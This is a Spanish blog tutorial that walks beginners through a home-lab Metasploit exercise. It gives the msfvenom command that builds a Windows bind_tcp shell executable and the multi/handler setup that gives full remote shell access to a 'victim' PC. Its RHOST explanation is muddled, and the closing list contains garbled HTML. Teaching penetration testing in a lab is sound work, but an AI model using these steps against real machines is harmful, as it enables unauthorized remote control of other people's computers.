Metasploit: guía básica paso a paso para principiantes

por | Mar 31, 2015 | Tecnología | 0 Comentarios

Metasploit es uno de los frameworks más conocidos en el mundo de la seguridad informática. Trae preparados cientos de exploits listos para ser lanzados y es utilizado tanto por pentesters como por investigadores de ciberseguridad.

Si no lo conoces todavía… ¡ya vas tarde! 🔐 En este artículo vamos a hacer un ejercicio práctico muy sencillo con Metasploit, ideal para quienes se inician en el hacking ético. Así podrás ver el potencial de esta herramienta y aprender los primeros pasos para usarla en tu propio laboratorio.

El escenario del ejercicio con Metasploit

El escenario para este ejercicio está formado por dos máquinas, el atacante y la víctima. Presentamos a los participantes:

🖥️ A mi izquierda, una maquina física con Windows 7 instalado, la víctima.

💻 A mi derecha, una máquina virtual con la distribución Kali Linux, el atacante.

Para este ejercicio se ha trabajado con la subred 192.168.149.0/24, para repetir el ejemplo debéis estar atentos a cambiar las IPs y adaptarlas a vuestro escenario.

En este caso, el ataque que simularemos es uno de los más sencillos posibles, generaremos un archivo ejecutable que abra una Shell con stagers del tipo bind_tcp, para después ejecutarlo en la máquina atacada y comprobar el funcionamiento básico de metasploit.

Generar un ejecutable con msfvenom

Para crear el ejecutable infectado usamos la herramienta msfvenom, incluida en el framework Metasploit. Para abrir la herramienta simplemente la ejecutamos en línea de comandos de Kali y vemos los payloads disponibles con el comando show payloads.

En este caso usaremos una shell bind_tcp. Generamos entonces el ejecutable tomando en consideración que el RHOST es la IP del equipo Kali. Este recibirá la conexión desde el equipo víctima (donde la IP del equipo atacante es 192.168.149.131 y el puerto desde donde se realizará la conexión será el 80):

msfvenom –p windows/shell/bind_tcp RHOST=192.168.149.131 LPORT=80 –f exe > p7.exe

Esto generará un archivo p7.exe que después ejecutaremos en la máquina víctima.

Configurar Metasploit para ejecutar el exploit

Una vez generado el ejecutable, configuramos el framework de metasploit para hacer uso del exploit y conseguir la Shell que pretendemos en nuestra máquina, obteniendo así acceso a la máquina infectada. Primero arrancamos el framework con msfconsole y elegimos el exploit y payload a utilizar: use exploit/multi/handler

Para ver las opciones del exploit y configurar los parámetros, se ejecuta el comando show options. En este caso las opciones que necesitamos configurar para que el ataque sea efectivo son el puerto local LPORT y el host remoto al que conectaremos RHOST. Para configurarlas empleamos el siguiente formato: set  OPCIÓN VALOR, por ejemplo set LPORT 4444. Para este ejercicio, RHOST será la IP del equipo víctima (192.168.149.132).

Comprobamos que está todo correctamente configurado y finalmente lanzamos el exploit, que quedará a la espera de que el equipo atacado ejecute el ejecutable generado: exploit y doble click en el ejecutable generado dentro de la máquina víctima. Si todo se ha hecho bien, tendremos una shell en el equipo víctima y veremos algo como esto en nuestro Kali:

Y eso es todo, ya tenemos acceso total a la máquina atacada a través de esta shell. Esto es sólo un ejemplo básico del potencial de metasploit, pero sin duda llega mucho más allá. Permanece atento a nuestras redes sociales para saber más sobre metasploit y otras herramientas de hacking ético.

Conclusiones: qué puedes aprender con Metasploit

Este ejercicio es solo una introducción muy básica al potencial de Metasploit. La herramienta permite mucho más:

    «</yoastmark»>»»>=»»>end=»3071″>

  • Escanear vulnerabilidades.

  • data-end=»2971″>

    «2939» data-end=»2971″>Automatizar ataques avanzados.

  • Integrarse con otras herramientas de Kali Linux.

  • Realizar pruebas de penetración completas.

0 comentarios

Enviar un comentario

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

Conoce conceptos clave de la era digital en nuestro HUB

 

 

Descarga nuestro ebook con todo lo que necesitas saber sobre IoT Industrial.

Suscríbete a nuestra newsletter

Recibe las últimas noticias sobre innovación y nuevas tecnologías y mantente al día de los avances más destacados

Cesión de datos

Calle Factores 2, 41015 Seville

Phone: +34 618 72 13 58

Email: info@secmotic.com

MENU